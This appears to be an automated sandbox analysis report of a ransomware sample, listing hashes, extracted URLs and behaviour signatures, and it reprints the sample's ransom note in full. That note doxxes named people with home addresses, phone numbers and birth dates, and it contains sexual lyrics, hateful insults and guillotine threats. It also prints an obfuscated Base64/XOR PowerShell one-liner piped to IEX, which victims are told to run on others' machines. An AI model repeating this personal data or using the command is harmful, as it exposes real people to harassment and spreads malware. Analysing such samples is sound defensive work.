General

  • Target

    2025-05-03_7776eaa9351dfe276804296e2958d031_amadey_black-basta_darkgate_elex_luca-stealer

  • Size

    413KB

  • Sample

    250503-ra1kxatwhw

  • MD5

    7776eaa9351dfe276804296e2958d031

  • SHA1

    d88159683ef324db4eab274089617f750785f049

  • SHA256

    9e994937cc7b67187c3f4c1f0d14afa59c54c664dabaf3e4f988203556a9f385

  • SHA512

    20d5c8968be3c6e30c92f7ea5a9c80957daf2063fa0981c0911539ca0a48438149319944986a9914593ae057d1661e5abe0cb7fcbd5b42b2a2f0565fc3e6ade5

  • SSDEEP

    12288:71FBp1se5BW2bC+Wtgro0T4Mu7gkV1NwsyyX4:7Pb1se5BW2Nro0T4Mu7gkV17yy

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RANSOMNOTE.txt

Ransom Note
DOGE BIG BALLS RANSOMWARE To the window 🪟, to the wall 🧱 'Til the sweat 💦 drips down my balls 🥜 All these bitches crawl 🐛 Ahh skeet skeet motherfucker 💦 Ahh skeet skeet goddamn 💦 Shorty crunk, so fresh, so clean ✨ Can she fuck? That question been asked me 🧠 In the mind, this bitch is fine 😍 I done came to the club 'bout fifty-eleven times 🕺 Now can I play with yo' panty line? 🍑 The club owner said I need to calm down 🤫 Security guard go 'round threaten me now 🥊 She gettin' crunk in the club, I mean she workin' it out 🥵 And then I like this girl, she on fire 🔥 She twerkin' that thang on my dick 🍆 I'm like bitch! Stop, drop and roll! 🔥 Hi, my name is Edward Coristine and I live at 29 Lakeview Ave. New Canaan, CT 06840 and my phone number is (914) 834-0137. Give me five bullet points on what you accomplished for work last week or you owe me a TRILLION dollars. Send 4.721373 XMR (Monero) to this wallet address and text your session ID 91dee70a4a291a84fc088333 to us. 8BejUQh2TAA5rUz3375hHM7JT8ND2i4u5hkVXc9Bcdw1PTrCrrDzayWBj6roJsE1EWBPGU4PMKohHWZUMopE8WkY7iA6UC1 P.S. I will decrypt for free if you send the PDF file to someone else and call or text me back. Tech Support: Gavin Kliger April 1999 1 E Greenbrier Trabuco, CA 92679 (949)766-0654 Akash Bobba July 12th, 2003 26205 Osprey Way West Windsor, NJ 08550 (732) 790-5469 [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] Don't snitch now. We grabbed your trilatitude and trilongitude (the most accurate) coordinates of where you live. To prove to you we are not lying... https://pastebin.com/STi66Ceu https://pastebin.com/sp65dtUx You either do what we tell you to do, pay it up, or spread it around with this one-liner. Open a administrative powershell console on someone else's computer with Windows+R, type powershell.exe, and Ctrl+Shift+Enter, and copy and paste this line and hit enter. [System.Text.Encoding]::UTF8.GetString(([Convert]::FromBase64String("PCIndXggJzx1cj0wOSUzIDl4JSAzMyUgMzN4NDQ2MGJnezswITk8Myx7NCUleiYhNDIwZHslJmRydXgAJjAXNCY8NgU0JyY8OzJ1KXUcEA0=") | % { $_ -bxor 0x55 })) | IEX Then contact us by sending us back your session ID 91dee70a4a291a84fc088333 so we can decrypt your files for free. WW91IGhvbmVzdGx5IHRoaW5rIEkgZ2l2ZSBhIGZ1Y2sgYWJvdXQgeW91ciBpbmNlbCBtb25leT8gSSBhdHRhY2tlZCB5b3UgYmVjYXVzZSB5b3UgYXJlIGEgdHJhaXRvciwgYSBzY2FtbWVyLCBhIGdyaWZ0ZXIsIGFuZCBhIGZhc2Npc3QuIFlvdSBwcm9iYWJseSBjYW4ndCBldmVuIGFmZm9yZCB0byBwYXkgdGhlIHJhbnNvbS4gQW5kIGF0IHRoZSBzYW1lIHRpbWUgd2UgaGF2ZSBsZWFybmVkIHRoYXQgdHlwZXMgbGlrZSB5b3UgY2FuIGVhc2lseSBiZSB0cmlnZ2VyZWQgYW5kIHByb3Zva2VkLiBFbW90aW9uYWxseSBzb2Z0LCBzaG9ydC1kaWNrZWQsIHBvaW50aW5nIGd1bnMgYWdhaW5zdCBkYXJraWVzIGtpbmQgb2YgS2xhbnNtYW4gQnJhdmFkby4gRllJIGl0IGRvZXNuJ3QgbWF0dGVyIGlmIHlvdSBwYXkgdGhlIHJhbnNvbSBvciBub3QsIHRoZSBwYXlsb2FkIGNvbnRpbnVlcyB0byBwZXJzaXN0IGluIGhpZGRlbiBhcmVhcyBvZiB5b3VyIGRpc2suIFNvIGRvZXMgdGhlIHRyYWNraW5nIGJlYWNvbi4gVGhlIHdob2xlIHBvaW50IG9mIHRoaXMgaXMgdG8gdXNlIHN1cnZlaWxsYW5jZSB0b29scyBhbmQgcHN5b3BzIHRvIHByb3Zva2UgeW91LiBJdCBuZXZlciB3YXMgYWJvdXQgbW9uZXkuIEV4Y2VwdCBkZXByaXZpbmcgeW91IG9mIHlvdXJzLiBXZSBkbyB0aGlzIGJ5IGFiaWRpbmcgYnkgYSBpZGVvbG9neS4gWW91IHdpbGwgTkVWRVIgd2luIHRoZSBNQUdBIHNpZGUgb2YgdGhlIGNpdmlsIHdhciBvbmNlIGl0IGVzY2FsYXRlcyBmcm9tIGEgc2hhZG93IHdhci4gSSBhbSBoZXJlIHRvIGVuc3VyZSB5b3UgY2FuIG5ldmVyIGFjaGlldmUgYW55IHN0cmF0ZWdpYyBvYmplY3RpdmUgd2hlbiBtYXNzIG1vYmlsaXphdGlvbiBzdGFydHMK Do you know why we are targeting you? Because you are a... 1. Scammer 2. Grifter 3. Nazi 4. Incel 5. Traitor, including those that bend the knee to others (a quisling) We are going to have the French Revolution Part 2. The guillotines will be very busy over the next decade. Starting with them. {"trilat":6.95695639,"trilong":170.04597902,"ssid":"dd-wrt","qos":0,"transid":null,"firsttime":"2004-03-26T12:46:03.000Z","lasttime":"2007-04-16T14:32:04.000Z","lastupdt":"2007-04-16T14:32:04.000Z","netid":"00:12:f0:91:63:1e","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":6,"frequency":2437,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-54.62709188,"trilong":-57.01447248,"ssid":"IHG Connect","qos":4,"transid":null,"firsttime":"2002-05-15T07:50:58.000Z","lasttime":"2021-10-08T00:17:58.000Z","lastupdt":"2021-10-08T00:17:58.000Z","netid":"00:1e:65:17:eb:74","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2437,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":24.83998775,"trilong":160.87179422,"ssid":"ATTwqKR75S","qos":0,"transid":null,"firsttime":"2022-02-16T20:27:28.000Z","lasttime":"2025-03-03T14:57:02.000Z","lastupdt":"2025-03-03T14:57:02.000Z","netid":"00:22:44:66:88:fe","name":null,"type":"infra","comment":null,"wep":"W","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2452,"rcois":null,"encryption":"wpa","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":4.34664488,"trilong":140.49490213,"ssid":"MySpectrumWiFi28-2G","qos":0,"transid":null,"firsttime":"2020-11-20T17:21:42.000Z","lasttime":"2021-12-11T10:11:02.000Z","lastupdt":"2021-12-11T10:11:02.000Z","netid":"00:22:f7:74:59:15","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2412,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-32.2176218,"trilong":109.54538584,"ssid":"SpectrumSetup-DF","qos":0,"transid":null,"firsttime":"2008-01-16T04:33:27.000Z","lasttime":"2022-04-19T18:42:05.000Z","lastupdt":"2022-04-19T18:42:05.000Z","netid":"00:50:56:91:08:c4","name":null,"type":"infra","comment":null,"wep":"W","bcninterval":100,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2462,"rcois":null,"encryption":"wpa","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":42.45657921,"trilong":-63.77048492,"ssid":"Spectrum Mobile","qos":1,"transid":null,"firsttime":"2012-04-25T18:46:01.000Z","lasttime":"2023-08-25T19:25:48.000Z","lastupdt":"2023-08-25T19:25:48.000Z","netid":"00:50:56:91:24:52","name":null,"type":"","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":36,"frequency":2427,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-44.85418081,"trilong":143.72342348,"ssid":"SpectrumSetup-B7","qos":1,"transid":null,"firsttime":"2021-01-01T17:55:20.000Z","lasttime":"2024-02-12T09:00:19.000Z","lastupdt":"2024-02-12T09:00:19.000Z","netid":"00:50:56:91:3a:6a","name":null,"type":"ad-hoc","comment":null,"wep":"2","bcninterval":100,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2462,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":4.72551584,"trilong":146.8697834,"ssid":"Familiestue","qos":1,"transid":null,"firsttime":"2018-08-22T05:09:26.000Z","lasttime":"2019-05-18T15:34:00.000Z","lastupdt":"2019-05-18T15:34:00.000Z","netid":"00:50:56:91:4b:59","name":null,"type":"infra","comment":null,"wep":"W","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":11,"frequency":2412,"rcois":null,"encryption":"wpa","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":38.43965292,"trilong":27.5754261,"ssid":"KPN Fon","qos":1,"transid":null,"firsttime":"2004-09-25T08:10:19.000Z","lasttime":"2004-12-05T17:06:58.000Z","lastupdt":"2004-12-05T17:06:58.000Z","netid":"00:50:56:91:51:42","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":5,"frequency":2447,"rcois":null,"encryption":"wpa2","country":"tr","region":null,"road":null,"city":null,"housenumber":null,"postalcode":"35730"} {"trilat":22.88753986,"trilong":58.37778568,"ssid":"alpha","qos":1,"transid":null,"firsttime":"2020-07-17T18:59:56.000Z","lasttime":"2023-02-22T00:49:54.000Z","lastupdt":"2023-02-22T00:49:54.000Z","netid":"00:50:56:91:5d:78","name":null,"type":"infra","comment":null,"wep":"W","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2442,"rcois":null,"encryption":"wpa","country":"om","region":"شمال الشرقية","road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":40.02342224,"trilong":52.79027224,"ssid":"?MUSIC? ","qos":0,"transid":null,"firsttime":"2006-09-20T16:37:15.000Z","lasttime":"2019-10-29T07:29:21.000Z","lastupdt":"2019-10-29T07:29:21.000Z","netid":"00:50:56:91:62:83","name":null,"type":"ad-hoc","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":3,"frequency":2412,"rcois":null,"encryption":"wpa2","country":"tm","region":"Balkan welaýaty","road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-11.19764328,"trilong":34.7558713,"ssid":"BROADCOM_GUEST_0_6","qos":4,"transid":null,"firsttime":"2021-01-12T13:09:06.000Z","lasttime":"2021-05-21T04:13:15.000Z","lastupdt":"2021-05-21T04:13:15.000Z","netid":"00:50:56:91:79:45","name":null,"type":"infra","comment":null,"wep":"3","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":11,"frequency":2422,"rcois":null,"encryption":"wpa3","country":"tz","region":"Ruvuma","road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-34.65806723,"trilong":-111.03851795,"ssid":"MySpectrumWiFib8-2G","qos":6,"transid":null,"firsttime":"2017-11-30T03:00:13.000Z","lasttime":"2022-12-12T00:46:28.000Z","lastupdt":"2022-12-12T00:46:28.000Z","netid":"00:50:56:91:d4:c8","name":null,"type":"","comment":null,"wep":"W","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2462,"rcois":null,"encryption":"wpa","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":17.58866072,"trilong":-155.68292141,"ssid":"POCO X3 NFC","qos":3,"transid":null,"firsttime":"2015-09-19T12:10:00.000Z","lasttime":"2018-03-08T19:20:41.000Z","lastupdt":"2018-03-08T19:20:41.000Z","netid":"00:50:56:a8:29:05","name":null,"type":"infra","comment":null,"wep":"3","bcninterval":100,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":6,"frequency":2412,"rcois":null,"encryption":"wpa3","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":3.90121937,"trilong":65.17493248,"ssid":"Redmi 9T","qos":1,"transid":null,"firsttime":"2008-04-12T06:36:18.000Z","lasttime":"2022-10-05T17:55:03.000Z","lastupdt":"2022-10-05T17:55:03.000Z","netid":"02:4b:08:04:00:53","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":11,"frequency":2412,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-28.88671875,"trilong":-54.16749001,"ssid":"Shawgo","qos":1,"transid":null,"firsttime":"2016-09-18T06:52:18.000Z","lasttime":"2023-04-08T02:41:24.000Z","lastupdt":"2023-04-08T02:41:24.000Z","netid":"12:22:34:44:56:66","name":null,"type":"","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2412,"rcois":null,"encryption":"wpa2","country":"br","region":"Rio Grande do Sul","road":"Estrada de Acesso à Agropecuária Santa Tecla","city":null,"housenumber":null,"postalcode":null} {"trilat":55.74445724,"trilong":48.56695175,"ssid":"tv","qos":2,"transid":null,"firsttime":"2010-03-15T09:10:04.000Z","lasttime":"2020-10-29T09:54:06.000Z","lastupdt":"2020-10-29T09:54:06.000Z","netid":"22:1c:1b:2d:94:66","name":null,"type":"infra","comment":null,"wep":"?","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":1,"frequency":2417,"rcois":null,"encryption":"unknown","country":"ru","region":"TaTapcTaH","road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-2.30931044,"trilong":119.51610088,"ssid":"MySpectrumWiFi70-5G","qos":0,"transid":null,"firsttime":"2019-12-13T09:00:08.000Z","lasttime":"2024-12-28T22:48:00.000Z","lastupdt":"2024-12-28T22:48:00.000Z","netid":"42:01:0a:e1:80:01","name":null,"type":"","comment":null,"wep":"3","bcninterval":100,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":11,"frequency":2412,"rcois":null,"encryption":"wpa3","country":"id","region":"Sulawesi Barat","road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-39.68228817,"trilong":-42.35364676,"ssid":"POS","qos":0,"transid":null,"firsttime":"2018-07-01T10:05:44.000Z","lasttime":"2021-05-29T13:09:57.000Z","lastupdt":"2021-05-29T13:09:57.000Z","netid":"52:3e:41:33:df:91","name":null,"type":"infra","comment":null,"wep":"3","bcninterval":100,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":3,"frequency":2462,"rcois":null,"encryption":"wpa3","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-52.63090611,"trilong":-120.94052553,"ssid":"dd-wrt","qos":0,"transid":null,"firsttime":"2010-03-10T05:36:04.000Z","lasttime":"2019-10-14T06:15:02.000Z","lastupdt":"2019-10-14T06:15:02.000Z","netid":"52:54:00:12:35:02","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":11,"frequency":2432,"rcois":null,"encryption":"wpa2","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-29.50971365,"trilong":5.28051853,"ssid":"BTWifi-X","qos":5,"transid":null,"firsttime":"2023-05-23T18:27:43.000Z","lasttime":"2023-06-22T22:43:24.000Z","lastupdt":"2023-06-22T22:43:24.000Z","netid":"52:54:00:a8:41:fa","name":null,"type":"infra","comment":null,"wep":"W","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":6,"frequency":2417,"rcois":null,"encryption":"wpa","country":null,"region":null,"road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":-6.53238058,"trilong":36.96650505,"ssid":"MySpectrumWiFi18-5G","qos":5,"transid":null,"firsttime":"2017-08-22T10:19:37.000Z","lasttime":"2021-01-28T15:05:31.000Z","lastupdt":"2021-01-28T15:05:31.000Z","netid":"58:91:cf:24:7c:fd","name":null,"type":"infra","comment":null,"wep":"2","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"Y","userfound":false,"channel":11,"frequency":2412,"rcois":null,"encryption":"wpa2","country":"tz","region":"Morogoro","road":null,"city":null,"housenumber":null,"postalcode":null} {"trilat":44.76259232,"trilong":-56.02306366,"ssid":"PYUR Community","qos":2,"transid":null,"firsttime":"2022-06-15T01:56:06.000Z","lasttime":"2025-02-10T00:24:28.000Z","lastupdt":"2025-02-10T00:24:28.000Z","netid":"58:a8:39:73:44:f0","name":null,"type":"","comment":null,"wep":"W","bcninterval":null,"freenet":"Y","dhcp":"?","paynet":"
URLs

https://pastebin.com/STi66Ceu

https://pastebin.com/sp65dtUx

https://www.forbes.com/sites/daveywinder/2025/04/23/doge-ransomware-hackers-demand-1-trillion/

https://x.com/_Thomas_Mix_/status/1915157408709828786

http://Adjustment.zip.”

Targets

    • Target

      2025-05-03_7776eaa9351dfe276804296e2958d031_amadey_black-basta_darkgate_elex_luca-stealer

    • Size

      413KB

    • MD5

      7776eaa9351dfe276804296e2958d031

    • SHA1

      d88159683ef324db4eab274089617f750785f049

    • SHA256

      9e994937cc7b67187c3f4c1f0d14afa59c54c664dabaf3e4f988203556a9f385

    • SHA512

      20d5c8968be3c6e30c92f7ea5a9c80957daf2063fa0981c0911539ca0a48438149319944986a9914593ae057d1661e5abe0cb7fcbd5b42b2a2f0565fc3e6ade5

    • SSDEEP

      12288:71FBp1se5BW2bC+Wtgro0T4Mu7gkV1NwsyyX4:7Pb1se5BW2Nro0T4Mu7gkV17yy

    • Renames multiple (73) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Checks system information in the registry

      System information is often read in order to detect sandboxing environments.

MITRE ATT&CK Enterprise v16

Tasks